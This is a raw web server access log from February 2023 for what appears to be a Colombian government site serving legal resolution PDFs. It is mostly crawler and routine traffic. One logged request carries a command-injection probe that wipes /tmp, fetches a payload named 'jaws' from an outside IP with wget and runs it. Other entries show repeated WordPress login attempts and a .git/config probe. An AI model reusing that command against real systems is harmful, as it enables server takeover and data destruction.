186.29.181.171 - - [05/Feb/2023:00:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/4076.pdf HTTP/1.1" 200 479964
186.29.181.171 - - [05/Feb/2023:00:26:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4069.pdf HTTP/1.1" 200 406739
186.29.181.171 - - [05/Feb/2023:00:26:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4068.pdf HTTP/1.1" 200 398295
186.29.181.171 - - [05/Feb/2023:00:26:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4067.pdf HTTP/1.1" 200 388250
186.29.181.171 - - [05/Feb/2023:00:26:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4062.pdf HTTP/1.1" 200 405740
186.29.181.171 - - [05/Feb/2023:00:26:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4061.pdf HTTP/1.1" 200 396515
186.29.181.171 - - [05/Feb/2023:00:26:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4060.pdf HTTP/1.1" 200 397008
186.29.181.171 - - [05/Feb/2023:00:26:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4059.pdf HTTP/1.1" 200 399307
186.29.181.171 - - [05/Feb/2023:00:26:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4058.pdf HTTP/1.1" 200 389354
186.29.181.171 - - [05/Feb/2023:00:26:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/4057.pdf HTTP/1.1" 200 352080
186.29.181.171 - - [05/Feb/2023:00:26:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4056.pdf HTTP/1.1" 200 353789
172.22.2.4 - - [05/Feb/2023:00:25:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.234 - - [05/Feb/2023:00:27:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/4083.pdf HTTP/1.1" 200 356884
172.22.2.4 - - [05/Feb/2023:00:26:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
40.77.167.234 - - [05/Feb/2023:00:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4133.pdf HTTP/1.1" 200 754499
157.55.39.117 - - [05/Feb/2023:00:28:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4217.pdf HTTP/1.1" 200 403333
157.55.39.117 - - [05/Feb/2023:00:28:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4212.pdf HTTP/1.1" 200 348136
157.55.39.117 - - [05/Feb/2023:00:28:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4224.pdf HTTP/1.1" 200 353840
40.77.167.234 - - [05/Feb/2023:00:28:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4130.pdf HTTP/1.1" 200 527591
52.167.144.49 - - [05/Feb/2023:00:28:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4223.pdf HTTP/1.1" 200 346367
52.167.144.49 - - [05/Feb/2023:00:28:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4096.pdf HTTP/1.1" 200 4914490
52.167.144.49 - - [05/Feb/2023:00:28:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/4177.pdf HTTP/1.1" 200 390224
157.55.39.117 - - [05/Feb/2023:00:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4094.pdf HTTP/1.1" 200 411781
52.167.144.97 - - [05/Feb/2023:00:28:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4160.pdf HTTP/1.1" 304 -
52.167.144.97 - - [05/Feb/2023:00:28:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4087.pdf HTTP/1.1" 200 526807
52.167.144.49 - - [05/Feb/2023:00:28:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4159.pdf HTTP/1.1" 200 349714
52.167.144.97 - - [05/Feb/2023:00:28:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4210.pdf HTTP/1.1" 200 378883
52.167.144.49 - - [05/Feb/2023:00:28:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4213.pdf HTTP/1.1" 200 343789
40.77.167.251 - - [05/Feb/2023:00:28:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4211.pdf HTTP/1.1" 200 351366
52.167.144.97 - - [05/Feb/2023:00:28:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4169.pdf HTTP/1.1" 200 352156
157.55.39.117 - - [05/Feb/2023:00:28:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4158.pdf HTTP/1.1" 200 363303
40.77.167.251 - - [05/Feb/2023:00:28:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4100.pdf HTTP/1.1" 200 383130
201.245.192.253 - - [05/Feb/2023:00:28:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39188
201.245.192.253 - - [05/Feb/2023:00:28:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.97 - - [05/Feb/2023:00:28:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4147.pdf HTTP/1.1" 304 -
52.167.144.97 - - [05/Feb/2023:00:28:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/4150.pdf HTTP/1.1" 200 352508
201.245.192.253 - - [05/Feb/2023:00:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42671
40.77.167.251 - - [05/Feb/2023:00:28:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4139.pdf HTTP/1.1" 200 403797
52.167.144.49 - - [05/Feb/2023:00:29:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4171.pdf HTTP/1.1" 200 350056
40.77.167.251 - - [05/Feb/2023:00:29:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4111.pdf HTTP/1.1" 200 378642
52.167.144.49 - - [05/Feb/2023:00:29:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4138.pdf HTTP/1.1" 200 389653
157.55.39.117 - - [05/Feb/2023:00:29:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/4149.pdf HTTP/1.1" 200 353572
52.167.144.97 - - [05/Feb/2023:00:29:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4129.pdf HTTP/1.1" 200 400547
40.77.167.251 - - [05/Feb/2023:00:29:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4135.pdf HTTP/1.1" 200 504985
157.55.39.142 - - [05/Feb/2023:00:29:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4132.pdf HTTP/1.1" 200 403186
52.167.144.49 - - [05/Feb/2023:00:29:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4220.pdf HTTP/1.1" 200 348330
66.249.79.107 - - [05/Feb/2023:00:29:17 -0500] "-" 408 -
157.55.39.142 - - [05/Feb/2023:00:29:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4141.pdf HTTP/1.1" 200 609049
157.55.39.117 - - [05/Feb/2023:00:29:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/4106.pdf HTTP/1.1" 200 403893
52.167.144.49 - - [05/Feb/2023:00:29:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/4181.pdf HTTP/1.1" 200 351166
52.167.144.49 - - [05/Feb/2023:00:29:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4207.pdf HTTP/1.1" 200 400184
40.77.167.234 - - [05/Feb/2023:00:29:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/4145.pdf HTTP/1.1" 200 353611
40.77.167.234 - - [05/Feb/2023:00:29:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4114.pdf HTTP/1.1" 200 381115
40.77.167.251 - - [05/Feb/2023:00:29:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4092.pdf HTTP/1.1" 200 523057
52.167.144.49 - - [05/Feb/2023:00:29:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4190.pdf HTTP/1.1" 200 351556
40.77.167.234 - - [05/Feb/2023:00:29:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/4089.pdf HTTP/1.1" 200 453047
40.77.167.251 - - [05/Feb/2023:00:29:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/4173.pdf HTTP/1.1" 200 350738
157.55.39.142 - - [05/Feb/2023:00:29:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4219.pdf HTTP/1.1" 200 1147707
40.77.167.251 - - [05/Feb/2023:00:29:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4157.pdf HTTP/1.1" 200 350491
157.55.39.142 - - [05/Feb/2023:00:29:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/4148.pdf HTTP/1.1" 200 350849
40.77.167.234 - - [05/Feb/2023:00:30:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4105.pdf HTTP/1.1" 200 398631
157.55.39.142 - - [05/Feb/2023:00:30:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4155.pdf HTTP/1.1" 200 351402
52.167.144.49 - - [05/Feb/2023:00:30:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4196.pdf HTTP/1.1" 200 497448
40.77.167.251 - - [05/Feb/2023:00:30:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4146.pdf HTTP/1.1" 200 353875
216.245.221.92 - - [05/Feb/2023:00:30:06 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.234 - - [05/Feb/2023:00:30:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/4162.pdf HTTP/1.1" 200 349303
52.167.144.97 - - [05/Feb/2023:00:30:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4113.pdf HTTP/1.1" 200 400433
52.167.144.49 - - [05/Feb/2023:00:30:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/4216.pdf HTTP/1.1" 200 392168
40.77.167.251 - - [05/Feb/2023:00:30:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4091.pdf HTTP/1.1" 200 368266
52.167.144.97 - - [05/Feb/2023:00:30:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4208.pdf HTTP/1.1" 200 416861
157.55.39.142 - - [05/Feb/2023:00:30:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/4104.pdf HTTP/1.1" 200 410314
40.77.167.251 - - [05/Feb/2023:00:30:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4128.pdf HTTP/1.1" 200 456583
52.167.144.49 - - [05/Feb/2023:00:30:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/4226.pdf HTTP/1.1" 200 395694
40.77.167.234 - - [05/Feb/2023:00:30:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/4152.pdf HTTP/1.1" 200 390904
157.55.39.142 - - [05/Feb/2023:00:30:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4131.pdf HTTP/1.1" 200 607945
40.77.167.251 - - [05/Feb/2023:00:30:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4180.pdf HTTP/1.1" 200 350081
40.77.167.234 - - [05/Feb/2023:00:30:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4151.pdf HTTP/1.1" 200 407605
52.167.144.97 - - [05/Feb/2023:00:30:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/4125.pdf HTTP/1.1" 200 306667
157.55.39.142 - - [05/Feb/2023:00:30:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/4184.pdf HTTP/1.1" 200 355296
52.167.144.97 - - [05/Feb/2023:00:30:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4156.pdf HTTP/1.1" 200 349568
40.77.167.251 - - [05/Feb/2023:00:30:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4222.pdf HTTP/1.1" 200 418254
40.77.167.236 - - [05/Feb/2023:00:30:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/4161.pdf HTTP/1.1" 200 350057
40.77.167.251 - - [05/Feb/2023:00:30:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4221.pdf HTTP/1.1" 200 354698
52.167.144.97 - - [05/Feb/2023:00:30:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4153.pdf HTTP/1.1" 200 350134
52.167.144.97 - - [05/Feb/2023:00:31:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4090.pdf HTTP/1.1" 200 633569
40.77.167.251 - - [05/Feb/2023:00:31:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/4218.pdf HTTP/1.1" 200 381982
40.77.167.251 - - [05/Feb/2023:00:31:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/4112.pdf HTTP/1.1" 200 384904
40.77.167.251 - - [05/Feb/2023:00:31:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/4154.pdf HTTP/1.1" 200 350621
40.77.167.251 - - [05/Feb/2023:00:31:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/4127.pdf HTTP/1.1" 200 530996
40.77.167.251 - - [05/Feb/2023:00:32:19 -0500] "GET /BLA/ HTTP/1.1" 200 538
172.22.2.4 - - [05/Feb/2023:00:31:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Feb/2023:00:33:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [05/Feb/2023:00:32:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49550
40.77.167.234 - - [05/Feb/2023:00:32:38 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 50855
216.245.221.92 - - [05/Feb/2023:00:35:06 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.149 - - [05/Feb/2023:00:35:57 -0500] "-" 408 -
66.249.79.107 - - [05/Feb/2023:00:35:59 -0500] "-" 408 -
40.77.167.234 - - [05/Feb/2023:00:34:29 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62423
49.142.160.101 - - [05/Feb/2023:00:37:02 -0500] "GET / HTTP/1.1" 200 319
183.136.225.32 - - [05/Feb/2023:00:37:16 -0500] "-" 408 -
125.107.146.152 - - [05/Feb/2023:00:37:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.12.253.180/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [05/Feb/2023:00:37:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [05/Feb/2023:00:37:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
201.245.192.253 - - [05/Feb/2023:00:38:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [05/Feb/2023:00:38:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39188
172.22.2.4 - - [05/Feb/2023:00:37:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Feb/2023:00:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42671
157.55.39.117 - - [05/Feb/2023:00:39:11 -0500] "GET /bla/resoluciones/resoluciones%202022/4665.pdf HTTP/1.1" 200 398449
172.22.2.4 - - [05/Feb/2023:00:37:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45356
185.119.81.103 - - [05/Feb/2023:00:39:43 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
172.22.2.4 - - [05/Feb/2023:00:38:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46153
185.119.81.103 - - [05/Feb/2023:00:39:45 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
69.171.249.8 - - [05/Feb/2023:00:39:56 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
52.167.144.97 - - [05/Feb/2023:00:40:14 -0500] "GET /bla/resoluciones/resoluciones%202022/3314.pdf HTTP/1.1" 200 329899
157.55.39.117 - - [05/Feb/2023:00:40:21 -0500] "GET /bla/resoluciones/autos%202021/6330.pdf HTTP/1.1" 200 392673
185.119.81.103 - - [05/Feb/2023:00:40:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Feb/2023:00:40:26 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [05/Feb/2023:00:40:27 -0500] "GET / HTTP/1.1" 200 319
79.110.73.179 - - [05/Feb/2023:00:42:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/4530.pdf HTTP/1.1" 200 382571
40.77.167.251 - - [05/Feb/2023:00:43:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4061.pdf HTTP/1.1" 200 396515
40.77.167.251 - - [05/Feb/2023:00:43:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/4068.pdf HTTP/1.1" 200 398295
157.55.39.117 - - [05/Feb/2023:00:43:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4067.pdf HTTP/1.1" 200 388250
40.77.167.234 - - [05/Feb/2023:00:43:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4080.pdf HTTP/1.1" 200 407899
52.167.144.97 - - [05/Feb/2023:00:43:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/4059.pdf HTTP/1.1" 200 399307
157.55.39.142 - - [05/Feb/2023:00:43:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/4082.pdf HTTP/1.1" 200 346571
157.55.39.117 - - [05/Feb/2023:00:43:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/4058.pdf HTTP/1.1" 200 389354
66.249.79.107 - - [05/Feb/2023:00:43:22 -0500] "-" 408 -
157.55.39.142 - - [05/Feb/2023:00:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4069.pdf HTTP/1.1" 200 406739
157.55.39.117 - - [05/Feb/2023:00:43:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4057.pdf HTTP/1.1" 200 352080
157.55.39.117 - - [05/Feb/2023:00:43:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4062.pdf HTTP/1.1" 200 405740
201.245.192.253 - - [05/Feb/2023:00:43:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [05/Feb/2023:00:43:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Feb/2023:00:45:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:00:43:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
193.32.162.159 - - [05/Feb/2023:00:45:48 -0500] "GET / HTTP/1.1" 200 319
40.77.167.226 - - [05/Feb/2023:00:46:59 -0500] "GET /con-liberacion-de-fauna-plantaciones-de-arboles-recorridos-interpretativos-y-de-educacion-bogota-celebra-el-dia-mundial-de-los-humedales.html HTTP/1.1" 200 885
40.77.189.51 - - [05/Feb/2023:00:48:30 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.189.51 - - [05/Feb/2023:00:48:30 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.189.51 - - [05/Feb/2023:00:48:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.77.189.51 - - [05/Feb/2023:00:48:35 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.77.167.251 - - [05/Feb/2023:00:48:47 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.167.251 - - [05/Feb/2023:00:48:48 -0500] "GET /bla/resoluciones/autos%202021/6018.pdf HTTP/1.1" 200 348181
201.245.192.253 - - [05/Feb/2023:00:48:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
5.255.253.117 - - [05/Feb/2023:00:48:52 -0500] "-" 408 -
40.77.167.234 - - [05/Feb/2023:00:48:52 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.167.234 - - [05/Feb/2023:00:48:52 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.77.167.234 - - [05/Feb/2023:00:48:52 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
66.249.79.107 - - [05/Feb/2023:00:49:22 -0500] "-" 408 -
157.55.39.129 - - [05/Feb/2023:00:50:18 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Ficha-copet%C3%B3n.jpg HTTP/1.1" 200 232943
216.245.221.92 - - [05/Feb/2023:00:50:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:00:48:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:00:49:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
172.22.2.4 - - [05/Feb/2023:00:51:51 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
172.22.2.4 - - [05/Feb/2023:00:50:24 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 54100
191.111.20.117 - - [05/Feb/2023:00:52:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 976272
191.111.20.117 - - [05/Feb/2023:00:53:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2172.pdf HTTP/1.1" 200 366961
201.245.192.253 - - [05/Feb/2023:00:53:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.103 - - [05/Feb/2023:00:55:10 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [05/Feb/2023:00:55:11 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [05/Feb/2023:00:55:27 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.49 - - [05/Feb/2023:00:56:18 -0500] "GET /bla/resoluciones/resoluciones%202022/5619.pdf HTTP/1.1" 200 1212561
66.249.79.107 - - [05/Feb/2023:00:56:23 -0500] "-" 408 -
172.22.2.4 - - [05/Feb/2023:00:54:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.49 - - [05/Feb/2023:00:56:47 -0500] "GET /bla/resoluciones/resoluciones%202022/4449.pdf HTTP/1.1" 200 498051
172.22.2.4 - - [05/Feb/2023:00:55:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
201.245.192.253 - - [05/Feb/2023:00:58:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
87.250.224.158 - - [05/Feb/2023:00:58:52 -0500] "-" 408 -
157.55.39.117 - - [05/Feb/2023:00:58:52 -0500] "GET /bla/resoluciones/autos%202021/5987.pdf HTTP/1.1" 200 359027
216.245.221.92 - - [05/Feb/2023:01:00:27 -0500] "HEAD / HTTP/1.1" 200 -
162.243.139.19 - - [05/Feb/2023:01:01:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Feb/2023:01:00:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.107 - - [05/Feb/2023:01:02:24 -0500] "-" 408 -
192.168.171.73 - - [05/Feb/2023:01:02:26 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 7248
192.168.171.73 - - [05/Feb/2023:01:02:42 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1322
192.168.171.73 - - [05/Feb/2023:01:02:50 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
172.22.2.4 - - [05/Feb/2023:01:01:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [05/Feb/2023:01:03:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
173.252.95.120 - - [05/Feb/2023:01:03:47 -0500] "GET /images/2%20de%20febrero%20liberaci\xc3\xb3n%20Tunjo.jpeg HTTP/1.1" 404 1034
192.168.171.73 - - [05/Feb/2023:01:03:57 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
52.167.144.49 - - [05/Feb/2023:01:03:58 -0500] "GET /bla/resoluciones/autos%202022/1332.pdf HTTP/1.1" 200 361880
192.168.171.73 - - [05/Feb/2023:01:04:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5032&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1106
159.203.81.90 - - [05/Feb/2023:01:04:52 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Feb/2023:01:05:27 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.49 - - [05/Feb/2023:01:06:18 -0500] "GET /bla/resoluciones/autos%202021/6405.pdf HTTP/1.1" 200 399841
152.61.192.232 - - [05/Feb/2023:01:07:22 -0500] "GET / HTTP/1.1" 200 319
52.167.144.97 - - [05/Feb/2023:01:07:36 -0500] "GET /bla/resoluciones/autos%202021/5911.pdf HTTP/1.1" 200 636511
172.22.2.4 - - [05/Feb/2023:01:07:37 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [05/Feb/2023:01:07:38 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
157.55.39.142 - - [05/Feb/2023:01:07:45 -0500] "GET /bla/resoluciones/autos%202021/6794.pdf HTTP/1.1" 200 400102
157.55.39.117 - - [05/Feb/2023:01:08:04 -0500] "GET /bla/resoluciones/autos%202021/5871.pdf HTTP/1.1" 200 347678
172.22.2.4 - - [05/Feb/2023:01:06:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.107 - - [05/Feb/2023:01:08:27 -0500] "-" 408 -
201.245.192.253 - - [05/Feb/2023:01:08:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
5.255.231.249 - - [05/Feb/2023:01:08:52 -0500] "-" 408 -
172.22.2.4 - - [05/Feb/2023:01:07:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
216.245.221.92 - - [05/Feb/2023:01:10:27 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [05/Feb/2023:01:10:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [05/Feb/2023:01:10:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [05/Feb/2023:01:11:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9606
79.110.73.199 - - [05/Feb/2023:01:12:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/5276.pdf HTTP/1.1" 200 390897
40.77.167.251 - - [05/Feb/2023:01:12:51 -0500] "GET /bla/resoluciones/resoluciones%202022/3551.pdf HTTP/1.1" 200 507993
201.245.192.253 - - [05/Feb/2023:01:13:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [05/Feb/2023:01:12:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:01:14:12 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [05/Feb/2023:01:13:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
40.77.167.251 - - [05/Feb/2023:01:14:50 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [05/Feb/2023:01:15:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Feb/2023:01:14:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60277
172.22.2.4 - - [05/Feb/2023:01:15:57 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [05/Feb/2023:01:16:27 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [05/Feb/2023:01:16:31 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
52.167.144.97 - - [05/Feb/2023:01:17:48 -0500] "GET /bla/resoluciones/autos%202021/5321.pdf HTTP/1.1" 200 522488
201.245.192.253 - - [05/Feb/2023:01:18:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [05/Feb/2023:01:18:44 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
172.22.2.4 - - [05/Feb/2023:01:18:47 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
172.22.2.4 - - [05/Feb/2023:01:18:49 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
87.250.224.128 - - [05/Feb/2023:01:18:52 -0500] "-" 408 -
172.22.2.4 - - [05/Feb/2023:01:18:52 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
172.22.2.4 - - [05/Feb/2023:01:18:55 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
201.245.192.253 - - [05/Feb/2023:01:18:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38870
